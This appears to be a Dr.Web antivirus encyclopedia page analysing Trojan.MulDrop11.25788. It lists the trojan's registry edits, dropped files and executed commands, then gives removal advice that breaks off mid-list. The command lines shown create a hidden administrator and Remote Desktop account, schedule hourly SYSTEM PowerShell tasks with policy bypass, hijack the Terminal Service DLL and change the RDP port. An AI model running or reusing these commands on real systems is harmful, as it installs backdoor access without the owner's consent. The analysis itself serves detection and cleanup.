Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.MulDrop11.25788

Добавлен в вирусную базу Dr.Web: 2019-10-27

Описание добавлено:

Technical Information

To ensure autorun and distribution
Creates or modifies the following files
  • <SYSTEM32>\tasks\68883
  • <SYSTEM32>\tasks\16823
Creates the following services
  • [<HKLM>\system\currentcontrolset\services\TermService\parameters] 'ServiceDLL' = '%WINDIR%\help\tmp5211.dat'
  • [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
Malicious functions
To complicate detection of its presence in the operating system,
forces the system hide from view:
  • hidden files
  • file extensions
Modifies settings of Windows Internet Explorer
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnOnPost' = '{01,00,00,00}'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'DisplayName' = 'Internet'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'PMDisplayName' = 'Internet [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Description' = 'This zone contains all Web sites you haven't...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Icon' = 'inetcpl.cpl#001313'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'LowIcon' = 'inetcpl.cpl#005425'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'CurrentLevel' = '00011500'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Flags' = '00000001'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'DisplayName' = 'Restricted sites'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'PMDisplayName' = 'Restricted sites [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Description' = 'This zone contains Web sites that could pote...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Icon' = 'inetcpl.cpl#00004481'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'CurrentLevel' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'LowIcon' = 'inetcpl.cpl#005426'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Flags' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '1200' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '1200' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '1200' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1200' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1200' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '1400' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '1400' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '1400' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1400' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '2500' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'DisplayName' = 'Computer'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Flags' = '00000047'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'CurrentLevel' = '00011000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'LowIcon' = 'inetcpl.cpl#005424'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Icon' = 'inetcpl.cpl#00004480'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '{AEBA21FA-782A-4A90-978D-B72164C80120}' = '{1a,37,61,59,23,5...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1A10' = '00000001'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '{A8A88C49-5EB2-4990-A1A2-0876022C854F}' = '{1a,37,61,59,23,5...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '{AEBA21FA-782A-4A90-978D-B72164C80120}' = '{1a,37,61,59,23,5...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1A10' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '{A8A88C49-5EB2-4990-A1A2-0876022C854F}' = '{1a,37,61,59,23,5...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'DisplayName' = 'My Computer'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'PMDisplayName' = 'My Computer [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Description' = 'Your computer'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Icon' = 'shell32.dll#0016'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'PMDisplayName' = 'Computer [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'CurrentLevel' = '00012000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'LowIcon' = 'inetcpl.cpl#005422'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'DisplayName' = 'Local intranet'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'PMDisplayName' = 'Local intranet [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Description' = 'This zone contains all Web sites that are on...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Icon' = 'shell32.dll#0018'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'LowIcon' = 'inetcpl.cpl#005423'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'CurrentLevel' = '00010500'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Flags' = '00000143'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'DisplayName' = 'Trusted sites'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'PMDisplayName' = 'Trusted sites [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Description' = 'This zone contains Web sites that you trust ...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Flags' = '00000021'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnonZoneCrossing' = '00000000'
Sets a new unauthorized home page for Windows Internet Explorer.
Modifies file system
Creates the following files
  • %TEMP%\nsy3f2f.tmp
  • C:\users\wgautilacc\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\command prompt.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\notepad.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\windows explorer.lnk
  • C:\users\wgautilacc\ntuser.ini
  • C:\users\wgautilacc\appdata\local\microsoft\windows\usrclass.dat.log1
  • C:\users\wgautilacc\appdata\local\microsoft\windows\usrclass.dat
  • C:\users\wgautilacc\ntuser.dat.log1
  • C:\users\wgautilacc\ntuser.pol
  • \device\termdd
  • C:\users\wgautilacc\appdata\local\microsoft\windows\explorer\explorerstartuplog.etl
  • C:\users\wgautilacc\appdata\local\temp\rgi920c.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi923b.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi927b.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi92db.tmp
  • C:\users\wgautilacc\appdata\local\temp\wgautilacc.bmp
  • C:\users\wgautilacc\appdata\local\temp\rgi9368.tmp
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\themes\transcodedwallpaper.jpg
  • C:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
  • D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
  • C:\users\wgautilacc\contacts\desktop.ini
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setad54.tmp
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setad74.tmp
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setad85.tmp
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setadb5.tmp
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setadf4.tmp
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint.dll
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint-datafile.dat
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint-pipelineconfig.xml
  • C:\users\wgautilacc\contacts\wgautilacc.contact
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\desktop.ini
  • C:\users\wgautilacc\appdata\local\temp\rgi92ba.tmp
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\run.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\maintenance\help.lnk
  • %TEMP%\nsy3f30.tmp\blowfish.dll
  • %TEMP%\chadshfsd323.txt
  • %TEMP%\premiumextraogscgsjbyk.ps1
  • %TEMP%\add.ps1
  • %TEMP%\nsy3f30.tmp\system.dll
  • %WINDIR%\help\tmp5211.dat
  • %WINDIR%\help\tmp5212.dat
  • %WINDIR%\help\tmp5213.dat
  • <SYSTEM32>\rfxvmt.dll
  • %WINDIR%\temp\usrnm.txt
  • <SYSTEM32>\microsoft\protect\s-1-5-20\e22087cf-07e0-49e3-9405-db4cd57635c3
  • <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
  • %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
  • C:\users\wgautilacc\ntuser.dat
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\maintenance\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\magnify.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\private character editor.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\control panel.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\computer.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\on-screen keyboard.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\narrator.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\ease of access.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\mail recipient.mapimail
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\fax recipient.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\desktop (create shortcut).desklink
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\compressed (zipped) folder.zfsendtotarget
  • C:\users\wgautilacc\appdata\roaming\microsoft\internet explorer\quick launch\window switcher.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\internet explorer\quick launch\shows desktop.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\protect\credhist
Sets the 'hidden' attribute to the following files
  • C:\users\wgautilacc\ntuser.dat
  • C:\users\wgautilacc\appdata\local\microsoft\windows\usrclass.dat
  • C:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
  • D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
  • C:\users\wgautilacc\contacts\desktop.ini
Deletes the following files
  • %TEMP%\nsy3f30.tmp\blowfish.dll
  • %TEMP%\nsy3f30.tmp\system.dll
  • %TEMP%\chadshfsd323.txt
  • C:\users\wgautilacc\appdata\local\temp\rgi920c.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi923b.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi927b.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi92ba.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi92db.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi9368.tmp
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\mxdwdrv.dll
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\tsprint-datafile.dat
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\tsprint-pipelineconfig.xml
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\tsprint.dll
  • <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\xpssvcs.dll
Moves the following files
  • from <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setad54.tmp to <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\tsprint.dll
  • from <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setad74.tmp to <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\tsprint-pipelineconfig.xml
  • from <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setad85.tmp to <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\tsprint-datafile.dat
  • from <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setadb5.tmp to <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\mxdwdrv.dll
  • from <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\setadf4.tmp to <SYSTEM32>\spool\drivers\x64\{858c09b1-2067-4077-8269-5f897d7ca75d}\xpssvcs.dll
  • from <SYSTEM32>\spool\drivers\x64\3\new\tsprint.dll to <SYSTEM32>\spool\drivers\x64\3\tsprint.dll
  • from <SYSTEM32>\spool\drivers\x64\3\new\tsprint-datafile.dat to <SYSTEM32>\spool\drivers\x64\3\tsprint-datafile.dat
  • from <SYSTEM32>\spool\drivers\x64\3\new\tsprint-pipelineconfig.xml to <SYSTEM32>\spool\drivers\x64\3\tsprint-pipelineconfig.xml
Deletes itself.
Network activity
UDP
  • DNS ASK la##.icu
Miscellaneous
Searches for the following windows
  • ClassName: 'CicLoaderWndClass' WindowName: ''
  • ClassName: 'Progman' WindowName: ''
  • ClassName: 'Proxy Desktop' WindowName: ''
  • ClassName: 'PersonalizationThemeChangeListener' WindowName: ''
  • ClassName: 'SystemTray_Main' WindowName: ''
  • ClassName: 'OutlookExpressHiddenWindow' WindowName: ''
Creates and executes the following
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\premiumextraOGSCGSJBYK.ps1
  • '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\premiumextraOGSCGSJBYK.ps1' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc 0000999999 /del' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc CDHRehwa /add' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" hdecifuhl$ /ADD' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc CDHRehwa' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /C schtasks /create /tn 68883 /tr "powershell -nop -ep bypass -f %WINDIR%\help\82791.ps1" /ru system /sc hourly /mo 1' (with hidden window)
  • '<SYSTEM32>\userinit.exe' ' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /C schtasks /create /tn 16823 /tr "powershell -nop -ep bypass -f %WINDIR%\help\88204.ps1" /ru system /sc hourly /mo 1' (with hidden window)
  • '%WINDIR%\syswow64\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36' (with hidden window)
Executes the following
  • '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\premiumextraOGSCGSJBYK.ps1
  • '<SYSTEM32>\net.exe' LOCALGROUP "Administrators" wgautilacc /ADD
  • '<SYSTEM32>\net1.exe' LOCALGROUP "Administrators" wgautilacc /ADD
  • '<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc CDHRehwa
  • '<SYSTEM32>\net.exe' user wgautilacc CDHRehwa
  • '<SYSTEM32>\net1.exe' user wgautilacc CDHRehwa
  • '<SYSTEM32>\cmd.exe' /C schtasks /create /tn 68883 /tr "powershell -nop -ep bypass -f %WINDIR%\help\82791.ps1" /ru system /sc hourly /mo 1
  • '<SYSTEM32>\schtasks.exe' /create /tn 68883 /tr "powershell -nop -ep bypass -f %WINDIR%\help\82791.ps1" /ru system /sc hourly /mo 1
  • '<SYSTEM32>\smss.exe' 00000000 0000003c
  • '<SYSTEM32>\csrss.exe' ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitializa...
  • '<SYSTEM32>\winlogon.exe'
  • '<SYSTEM32>\rdpclip.exe'
  • '%WINDIR%\explorer.exe'
  • '%WINDIR%\syswow64\rundll32.exe' %WINDIR%\SysWOW64\mscories.dll,Install
  • '<SYSTEM32>\cmd.exe' /C schtasks /create /tn 16823 /tr "powershell -nop -ep bypass -f %WINDIR%\help\88204.ps1" /ru system /sc hourly /mo 1
  • '<SYSTEM32>\schtasks.exe' /create /tn 16823 /tr "powershell -nop -ep bypass -f %WINDIR%\help\88204.ps1" /ru system /sc hourly /mo 1
  • '%WINDIR%\syswow64\ie4uinit.exe' -BaseSettings
  • '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
  • '%WINDIR%\syswow64\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36
  • '<SYSTEM32>\regsvr32.exe' /s /n /i:/UserInstall <SYSTEM32>\themeui.dll
  • '<SYSTEM32>\rundll32.exe' uxtheme.dll,#64 %WINDIR%\resources\Themes\Aero\Aero.msstyles?NormalColor?NormalSize
  • '%ProgramFiles(x86)%\windows mail\winmail.exe' OCInstallUserConfigOE
  • '%ProgramFiles%\windows mail\winmail.exe' OCInstallUserConfigOE
  • '<SYSTEM32>\unregmp2.exe' /FirstLogon /Shortcuts /RegBrowsers /ResetMUI
  • '<SYSTEM32>\regsvr32.exe' /s /n /i:U shell32.dll
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  • '<SYSTEM32>\userinit.exe'
  • '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" hdecifuhl$ /ADD
  • '<SYSTEM32>\net.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  • '<SYSTEM32>\takeown.exe' /A /F rfxvmt.dll
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /inheritance:d
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove BUILTIN\Administrators
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant BUILTIN\Administrators:RX
  • '<SYSTEM32>\reg.exe' ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  • '<SYSTEM32>\reg.exe' add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %WINDIR%\help\tmp5211.dat /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  • '<SYSTEM32>\net1.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" hdecifuhl$ /ADD
  • '<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc 0000999999 /del
  • '<SYSTEM32>\net.exe' user wgautilacc 0000999999 /del
  • '<SYSTEM32>\net1.exe' user wgautilacc 0000999999 /del
  • '<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc CDHRehwa /add
  • '<SYSTEM32>\net.exe' user wgautilacc CDHRehwa /add
  • '<SYSTEM32>\net1.exe' user wgautilacc CDHRehwa /add
  • '<SYSTEM32>\cmd.exe' /c del %temp%\*.ps1 /f
  • '<SYSTEM32>\cmd.exe' /c del %temp%\*.txt /f
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  • '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  • '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  • '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" hdecifuhl$ /ADD
  • '%ProgramFiles(x86)%\google\chrome\application\42.0.2311.135\installer\chrmstp.exe' --configure-user-settings --verbose-logging --system-level --multi-install --chrome

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
